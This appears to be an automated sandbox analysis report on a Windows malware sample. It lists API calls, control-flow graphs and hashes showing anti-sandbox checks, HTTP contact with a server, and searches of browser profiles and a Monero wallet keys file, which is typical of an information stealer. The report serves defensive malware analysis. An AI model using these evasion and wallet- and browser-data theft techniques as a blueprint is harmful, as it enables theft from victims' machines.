                        control_flow_graph 1436 861220-861247 call 8789b0 GlobalMemoryStatusEx 1439 861273-86127a 1436->1439 1440 861249-861271 call 87da00 * 2 1436->1440 1442 861281-861285 1439->1442 1440->1442 1444 861287 1442->1444 1445 86129a-86129d 1442->1445 1447 861292-861294 ExitProcess 1444->1447 1448 861289-861290 1444->1448 1448->1445 1448->1447
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0086123E
                        • __aulldiv.LIBCMT ref: 00861258
                        • __aulldiv.LIBCMT ref: 00861266
                        • ExitProcess.KERNEL32 ref: 00861294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 3404098578-2766056989
                        • Opcode ID: ffa6505da8649d391e77923fc21b9e7f875cc4cb9c0d9c8f62c07156d207ac82
                        • Instruction ID: b29d3c974897efd884f29ace93f5759afc4bc74184379b0381dd787be9a3865b
                        • Opcode Fuzzy Hash: ffa6505da8649d391e77923fc21b9e7f875cc4cb9c0d9c8f62c07156d207ac82
                        • Instruction Fuzzy Hash: 89014BB0D40308AAEF10DBE4CC49BAEBBB8FB14705F248458E705FA2C1D7749545879A
                        Function 00876AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1450 876af3 1451 876b0a 1450->1451 1453 876b0c-876b22 call 876920 call 875b10 CloseHandle ExitProcess 1451->1453 1454 876aba-876ad7 call 87aad0 OpenEventA 1451->1454 1459 876af5-876b04 CloseHandle Sleep 1454->1459 1460 876ad9-876af1 call 87aad0 CreateEventA 1454->1460 1459->1451 1460->1453
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011694E8,?,0088110C,?,00000000,?,00881110,?,00000000,00880AEF), ref: 00876ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00876AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00876AF9
                        • Sleep.KERNEL32(00001770), ref: 00876B04
                        • CloseHandle.KERNEL32(?,00000000,?,011694E8,?,0088110C,?,00000000,?,00881110,?,00000000,00880AEF), ref: 00876B1A
                        • ExitProcess.KERNEL32 ref: 00876B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: e74bb41909cc6272bc76503ef68dba0bf28b32fb6d07a6c94f337058f3f71e9c
                        • Instruction ID: 1cb2a8bc2fda49916c0c39a934d3da915ba64a873385dd3b7f09998bbbf9f3bd
                        • Opcode Fuzzy Hash: e74bb41909cc6272bc76503ef68dba0bf28b32fb6d07a6c94f337058f3f71e9c
                        • Instruction Fuzzy Hash: D6F03A3094461AABE700EBA09C06BBEBA74FB15705F10C514B51AE11C9EBB09541DA67
                        Function 008647B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 9921ed388d63006035e0fbde341daad4bb494eb4e665a3db02e4d887ad270c01
                        • Instruction ID: 8fb385d09340b670f63eca6772191fb577b7437a26e841d0b7bd07cd1372c46b
                        • Opcode Fuzzy Hash: 9921ed388d63006035e0fbde341daad4bb494eb4e665a3db02e4d887ad270c01
                        • Instruction Fuzzy Hash: 222142B1D00209ABDF14DFA5EC45ADE7774FB45310F108625F525A72D1DB70660ACF92
                        Function 008751F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 00866280: InternetOpenA.WININET(00880DFE,00000001,00000000,00000000,00000000), ref: 008662E1
                          • Part of subcall function 00866280: StrCmpCA.SHLWAPI(?,0116ED88), ref: 00866303
                          • Part of subcall function 00866280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00866335
                          • Part of subcall function 00866280: HttpOpenRequestA.WININET(00000000,GET,?,0116E750,00000000,00000000,00400100,00000000), ref: 00866385
                          • Part of subcall function 00866280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008663BF
                          • Part of subcall function 00866280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008663D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00875228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 2932815453cc85a64824f94d5974d170785930eac6f408f6edc1f94c375ebadb
                        • Instruction ID: bed737a98d5971dde9f0a65c72d6bfbe8df37283a726b52badeb8b8583a69cc4
                        • Opcode Fuzzy Hash: 2932815453cc85a64824f94d5974d170785930eac6f408f6edc1f94c375ebadb
                        • Instruction Fuzzy Hash: 3711CE30910548A6CB18FB68DD969ED7378FF90344F408164A81EDA596EF74AB06C793
                        Function 00861110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0086112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00861132
                        • ExitProcess.KERNEL32 ref: 00861143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: a20a433e476b11908636d5a68b9e73b5236566ef2001dd982650c2a9ddec1329
                        • Instruction ID: 56924f615ba341a4dca5a107b64e1f028d128316d6470b8b3a919207cd0dc055
                        • Opcode Fuzzy Hash: a20a433e476b11908636d5a68b9e73b5236566ef2001dd982650c2a9ddec1329
                        • Instruction Fuzzy Hash: FFE08670945308FFEB50ABE09C0EB0D76F8EB05B01F100044F708F61C1C7B42A01D69A
                        Function 008610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008610B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008610F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: abf0fa31c1a7866010918f16ec6827b97e66a8fb968df91eb34e6b9537d9afbb
                        • Instruction ID: ea054f9bfb8a593270d1712ac84a215ca205784cda767264311a617960c5f093
                        • Opcode Fuzzy Hash: abf0fa31c1a7866010918f16ec6827b97e66a8fb968df91eb34e6b9537d9afbb
                        • Instruction Fuzzy Hash: 64F0E271681208BBEB14DAA8AC4DFBBB7E8E705B15F300448FA04E3280D6719E00CAA1
                        Function 00861190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 008778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877910
                          • Part of subcall function 008778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00877917
                          • Part of subcall function 008778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0087792F
                          • Part of subcall function 00877850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008611B7), ref: 00877880
                          • Part of subcall function 00877850: RtlAllocateHeap.NTDLL(00000000), ref: 00877887
                          • Part of subcall function 00877850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0087789F
                        • ExitProcess.KERNEL32 ref: 008611C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: c6feab838b2be0cf50104a6b71f40499304580e6de524476dd312959086516cb
                        • Instruction ID: a4cb7d724cfcb59f1aa41cdb959bd715170606d963b91854d9660baddef03f27
                        • Opcode Fuzzy Hash: c6feab838b2be0cf50104a6b71f40499304580e6de524476dd312959086516cb
                        • Instruction Fuzzy Hash: 7CE0ECA595430253CA00B7F8AC0EB2A32DCFB26345F084434FA0DD2556FB29E801C56F

                        Non-executed Functions

                        Function 008738B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 008738CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 008738E3
                        • lstrcat.KERNEL32(?,?), ref: 00873935
                        • StrCmpCA.SHLWAPI(?,00880F70), ref: 00873947
                        • StrCmpCA.SHLWAPI(?,00880F74), ref: 0087395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00873C67
                        • FindClose.KERNEL32(000000FF), ref: 00873C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 2217a83993ea4f3d5b16aae91cee8af22b463fa0e11cdddc633dc24d0ed717eb
                        • Instruction ID: 92a9734e189a86a1abcc42420d8d1339b32079bf3e04695cf9ebdaa69aab28ed
                        • Opcode Fuzzy Hash: 2217a83993ea4f3d5b16aae91cee8af22b463fa0e11cdddc633dc24d0ed717eb
                        • Instruction Fuzzy Hash: A9A172B19002199BDB64DFA4CC85FEE73B8FB99300F048588A60DD6185EB759B85CF63
                        Function 0086BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00880B32,00880B2B,00000000,?,?,?,008813F4,00880B2A), ref: 0086BEF5
                        • StrCmpCA.SHLWAPI(?,008813F8), ref: 0086BF4D
                        • StrCmpCA.SHLWAPI(?,008813FC), ref: 0086BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086C7BF
                        • FindClose.KERNEL32(000000FF), ref: 0086C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 95f1a7d2c4afa878a60b83d37782357bbdc29796881ccde273d3c0979e2e1243
                        • Instruction ID: 4e63c564993a660b4d17d9c3c59a40df0b7bb7355954794852e00dd10a2fd320
                        • Opcode Fuzzy Hash: 95f1a7d2c4afa878a60b83d37782357bbdc29796881ccde273d3c0979e2e1243
                        • Instruction Fuzzy Hash: C44220729101049BCB18FBB8DD96EEE737DFB94300F408568B91AD6185EF349A49CB93
                        Function 00874910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0087492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00874943
                        • StrCmpCA.SHLWAPI(?,00880FDC), ref: 00874971
                        • StrCmpCA.SHLWAPI(?,00880FE0), ref: 00874987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00874B7D
                        • FindClose.KERNEL32(000000FF), ref: 00874B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
